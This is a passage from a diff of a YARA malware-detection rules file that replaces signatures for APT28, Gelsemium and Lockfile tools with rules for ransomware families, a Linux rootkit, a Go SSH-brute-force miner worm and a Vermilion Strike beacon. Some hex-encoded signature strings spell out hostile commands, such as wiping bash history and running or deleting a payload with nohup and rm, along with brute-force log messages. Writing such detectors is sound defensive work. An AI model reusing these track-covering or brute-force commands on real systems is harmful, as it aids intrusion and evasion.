-		logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f"
+		logic_hash = "ebe6e60c45336476fd91c4185eee0414c3eba83960301a610b69c8818dbb17fd"
 		score = 75
-		quality = 75
+		quality = 36
 		tags = "FILE"
-		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
-		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
-		adversary = "Lockfile"
+		hash1 = "6af8b3d31101f48911b13e49c660c10ed1d26b60267e8037d2ac174fc0d2f36c"
 
 	strings:
-		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
-		$s2 = "ncacn_np" fullword wide
-		$s3 = "WinSta0\\Default" fullword wide
-		$s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 }
-		$s5 = "EfsPotato <cmd>" wide
-		$s6 = "\\\\.\\pipe\\" wide
+		$lib1 = "/usr/bin/python2.7" fullword ascii
+		$lib2 = "libxselinux" fullword ascii
+		$c1 = "/cmdlineH" fullword ascii
+		$c2 = "/proc/%d/fd/%s" fullword ascii
+		$c3 = "/proc/self/exe" fullword ascii
+		$c4 = "__gmon_start__" fullword ascii
+		$c5 = "_ITM_registerTMCloneTable" fullword ascii
+		$c6 = "_ITM_deregisterTMCloneTable" fullword ascii
+		$d1 = "/usr/bin/netstat" fullword ascii
+		$d2 = "/var/run/libudev.pid" fullword ascii
+		$d3 = "/sbin/ifup-local" fullword ascii
+		$s1 = "EAEC2CA4-AF8D-4F61-8115-9EC26F6BF4E1" fullword ascii
+		$s2 = "readdir64" fullword ascii
+		$s3 = ".note.gnu.gold-version" fullword ascii
+		$s4 = ".note.gnu.build-id" fullword ascii
+		$s5 = ".eh_frame_hdr" fullword ascii
+		$s6 = "xlstat" fullword ascii
+		$s7 = "1YZ[\\<@nYSLRR]H_PGX[XmYXGFrstuvwxyz{|}~" fullword ascii
+		$info1 = "check_is_our_proc_dir" fullword ascii
+		$info2 = "get_our_sockets" fullword ascii
+		$info3 = "is_invisible_with_pids" fullword ascii
+		$info4 = "check_if_number" fullword ascii
+		$info5 = "get_our_pids" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 15KB and ( 1 of ( $lib* ) and 4 of ( $c* ) and 2 of ( $d* ) and 4 of ( $s* ) and 3 of ( $info* ) )
 }
-rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect Downdelph used by APT28 group"
+		description = "Detect Nemty ransomware"
 		author = "Arkbird_SOLG"
-		id = "0376c026-93eb-526a-8ab3-26bdd365e608"
-		date = "2021-02-18"
-		modified = "2021-02-19"
-		reference = "https://twitter.com/RedDrip7/status/1362343352759250946"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18"
+		id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde"
+		date = "2021-06-12"
+		modified = "2021-06-13"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420"
+		logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b"
+		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
+		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
+		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
+		tlp = "white"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d }
-		$s2 = "cmd.exe /c " fullword ascii
-		$s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
-		$s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 }
-		$s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 }
-		$s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
+		$s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00}
+		$s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf }
+		$s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 }
+		$s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Gelsenicine malware (Loader - Variant 1)"
+		description = "Detect the worm written in Go that drops XMRig Miner"
 		author = "Arkbird_SOLG"
-		id = "36276150-a5dd-5385-9e50-958a6fa54de5"
-		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19"
+		id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2"
+		date = "2021-07-06"
+		modified = "2021-07-06"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115"
+		logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb"
-		hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9"
-		hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c"
-		tlp = "white"
-		adversary = "Gelsemium"
+		hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe"
+		hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff }
-		$s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 }
-		$s3 = "pluginkey" fullword wide
-		$s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e }
+		$s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e }
+		$s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 }
+		$s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 }
+		$s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 }
+		$s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 }
+		$s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 }
+		$s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 900KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE
+rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect Gelsenicine malware (Loader - Variant 2)"
+		description = "Detect CryLock ransomware V2.0.0"
 		author = "Arkbird_SOLG"
-		id = "c6e28da2-622b-57ba-9381-9f8f6b8879bf"
-		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_2.yara#L1-L19"
+		id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0"
+		date = "2020-10-14"
+		modified = "2020-10-15"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "e1d6402c743af697c8d1b34087b6fe9db80237834d73967b0a0638023d4e4a40"
+		logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "6eaeca0cf28e74de6cfd82d29a3c3cc30c2bc153ac811692cc41ee290d766474"
-		hash1 = "d986207bc108e55f4b110ae208656b415d2c5fcc8f99f98b4b3985e82b9d5e5b"
-		hash1 = "ec491de0e2247f64b753c4ef0c7227ea3548c2f222b547528dae0cf138eca53a"
-		tlp = "white"
-		adversary = "Gelsemium"
+		hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831"
 
 	strings:
-		$s1 = { 48 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 c7 44 24 40 00 00 00 00 8b 05 [3] 00 a8 01 0f 85 96 00 00 00 83 c8 01 89 05 [3] 00 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 48 8d 0d [2] 00 00 e8 [2] 00 00 90 48 c7 43 08 00 00 00 00 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 4c 8d 0d [3] 00 4c 8d 05 [3] 00 33 d2 48 8b cb e8 86 f9 ff ff 48 8b c3 48 83 c4 30 }
-		$s2 = { 54 00 65 00 6d 00 70 00 2f 00 00 00 00 00 00 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 2f 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2f 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f }
-		$s3 = { 48 8b ca e8 [3] 00 48 39 5e 08 75 05 48 8b c3 eb 08 48 8b 46 10 48 2b 46 08 3b c3 0f 4c c3 48 63 c8 e8 [3] 00 48 89 47 08 48 8b 56 10 48 8b 4e 08 4c 8b d8 eb 10 4c 3b db 74 05 8a 01 41 88 03 49 ff c3 48 ff c1 48 3b ca 75 eb 4c 89 5f 10 4c 89 5f 18 48 8b c7 48 83 c4 20 5f 5e }
-		$s4 = { 45 33 c9 45 33 c0 ba 80 00 00 00 48 8b ce e8 16 f2 ff ff 84 c0 74 71 48 8d 53 18 41 b8 20 00 00 00 48 8b ce e8 e4 f4 ff ff 84 c0 74 5b 48 8d 53 38 41 b8 20 00 00 00 48 8b ce e8 56 f9 ff ff 84 c0 74 45 48 8b 43 10 48 8b 0d [3] 00 48 3b c1 74 0d 48 8b d8 48 8b 00 48 3b c1 75 f5 eb 1b 48 8b 43 08 eb 07 48 8b d8 48 8b 40 08 48 3b 58 10 74 f3 48 39 43 10 48 0f }
+		$s1 = "All commands sended to execution" fullword ascii
+		$s2 = "Processesblacklist1" fullword ascii
+		$s3 = "Execute all" fullword ascii
+		$s4 = "config.txt" fullword ascii
+		$debug1 = "Processed files: " fullword ascii
+		$debug2 = "Next -->" fullword ascii
+		$debug3 = "Status: scan network" fullword ascii
+		$debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
+		$debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 }
+		$debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 }
+		$ran1 = "w_to_decrypt.hta" wide
+		$ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii
+		$ran3 = "<%START_DATETIME%>" fullword ascii
+		$ran4 = "<%MAIN_CONTACT%>" fullword ascii
+		$ran5 = "<%RESERVE_CONTACT%>" fullword ascii
+		$ran6 = "<%HID%>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* ) and 4 of ( $debug* ) and 4 of ( $ran* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE
 {
 	meta:
-		description = "Detect Gelsemine malware (Dropper - Variant 1)"
+		description = "Detect MATRIX ransomware"
 		author = "Arkbird_SOLG"
-		id = "cfe932fd-ff50-5e54-824c-e11afe8e8575"
-		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsemine_June_2021_1.yara#L1-L19"
+		id = "a7df188c-e381-55e6-97e6-45f5830ff0d3"
+		date = "2020-10-15"
+		modified = "2020-10-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28"
 		license_url = "N/A"
-		logic_hash = "2b5031412de163ad92dfe00c7da331eb36c4ce7b590df48dfa84df0104e93b15"
+		logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "00b701e3ef29912c1fcd8c2154c4ae372cfe542cfa54ffcce9fb449883097cec"
-		hash2 = "109d4b8878b8c8f3b7015f6b3ae573a6799296becce0f32ca3bd216bee0ab473"
-		hash3 = "fe71b66d65d5ff9d03a47197c99081d9ec8d5f6e95143bdc33f5ea2ac0ae5762"
-		hash3 = "29e78ca3cb49dd2985a29e74cafb1a0a15515670da0f4881f6095fb2926bfefd"
-		tlp = "white"
-		adversary = "Gelsemium"
+		hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf"
+		hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40"
+		hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829"
+		hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6"
 
 	strings:
-		$s1 = { 8b 44 24 04 83 ec 40 85 c0 53 55 56 57 0f 84 ec 15 00 00 8b 58 1c 85 db 0f 84 e1 15 00 00 8b 48 0c 85 c9 0f 84 d6 15 00 00 83 38 00 75 0b 8b 48 04 85 c9 0f 85 c6 15 00 00 83 3b 0b 75 06 c7 03 0c 00 00 00 8b 48 0c 8b 30 8b 78 04 8b 53 38 8b 6b 3c 89 4c 24 28 8b 48 10 8b 03 83 f8 1e 89 4c 24 20 89 74 24 14 89 7c 24 18 89 54 24 10 89 7c 24 38 89 4c 24 2c c7 44 24 34 00 00 00 }
-		$s2 = { 33 c0 33 d2 8a 06 8a 56 01 03 c8 33 c0 8a 46 02 03 f9 03 ca 33 d2 8a 56 03 03 f9 03 c8 33 c0 8a 46 04 03 f9 03 ca 33 d2 8a 56 05 03 f9 03 c8 33 c0 8a 46 06 03 f9 03 ca 33 d2 8a 56 07 03 f9 03 c8 33 c0 8a 46 08 03 f9 03 ca 33 d2 8a 56 09 03 f9 03 c8 33 c0 8a 46 0a 03 f9 03 ca 33 d2 8a 56 0b 03 f9 03 c8 33 c0 8a 46 0c 03 f9 03 ca 33 d2 8a 56 0d 03 f9 03 c8 33 c0 8a 46 0e 03 f9 03 ca 33 d2 8a 56 0f 03 f9 03 c8 83 c6 10 03 f9 03 ca 03 f9 4d 0f 85 67 ff ff ff 8b c1 33 d2 b9 f1 ff 00 00 f7 f1 8b c7 bf f1 ff 00 00 8b ca 33 d2 f7 f7 ff 4c 24 18 8b fa 0f 85 38 ff ff ff 85 db 0f 84 da 00 00 00 83 fb 10 0f 82 a1 00 00 00 8b eb c1 ed 04 33 d2 33 c0 8a 16 8a 46 01 03 ca 33 d2 8a 56 02 03 f9 03 c8 33 c0 8a 46 03 03 f9 03 ca 33 d2 8a 56 04 03 f9 03 c8 33 c0 8a 46 05 03 f9 03 ca 33 d2 8a 56 06 03 f9 03 c8 33 c0 8a 46 07 03 f9 03 ca 33 d2 8a 56 08 03 f9 03 c8 33 c0 8a 46 09 03 f9 03 ca 33 d2 8a 56 0a 03 f9 03 c8 33 c0 8a 46 0b 03 f9 03 ca 33 d2 8a 56 0c 03 f9 03 c8 33 c0 8a 46 0d 03 f9 03 ca 33 d2 8a 56 0e 03 f9 03 c8 33 c0 8a 46 0f 03 f9 03 ca 83 eb 10 03 f9 03 c8 03 f9 83 c6 10 }
-		$s3 = { 55 8b ec 6a ff 68 [2] 40 00 68 [2] 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 68 53 56 57 89 65 e8 33 db 89 5d fc 6a 02 5f 57 ff 15 [2] 40 00 59 83 0d [2] 41 00 ff 83 0d [2] 41 00 ff ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 a1 [2] 40 00 8b 00 a3 [2] 41 00 e8 ?? 01 00 00 39 1d [3] 00 75 0c 68 [2] 40 00 ff 15 [2] 40 00 59 e8 ?? 01 00 00 68 [3] 00 68 [3] 00 e8 ?? 01 00 00 a1 [2] 41 00 89 45 94 8d 45 94 50 ff 35 [2] 41 00 8d 45 9c 50 8d 45 90 50 8d 45 a0 50 ff 15 [2] 40 00 68 [3] 00 68 00 [2] 00 e8 ?? 01 00 00 83 c4 24 a1 [2] 40 00 8b 30 3b }
+		$debug1 = "[LDRIVES]: not found!" fullword wide
+		$debug2 = "[DONE]: NO_SHARES!" fullword wide
+		$debug3 = "[ALL_LOCAL_KID]: " fullword wide
+		$debug4 = "[FINISHED]: G=" fullword wide
+		$debug5 = "[FEX_START]" fullword wide
+		$debug6 = "[LOGSAVED]" fullword wide
+		$debug7 = "[GENKEY]" fullword wide
+		$debug8 = "[SHARES]" fullword wide
+		$debug9 = "[SHARESSCAN]: " fullword wide
+		$reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d }
+		$reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d }
+		$reg3 = { 26 00 73 00 69 00 64 00 3d 00 }
+		$reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d }
+		$reg5 = { 47 00 45 00 54 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 150KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and 4 of ( $debug* ) and 3 of ( $reg* )
 }
-rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect Gelsevirine malware (Main Plug-in)"
+		description = "Detect the windows version of the beacon of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "31900186-2531-5558-aafb-67707040ddaf"
-		date = "2021-06-12"
-		modified = "2021-06-14"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18"
+		id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf"
+		logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1"
-		hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35"
-		tlp = "white"
-		adversary = "Gelsemium"
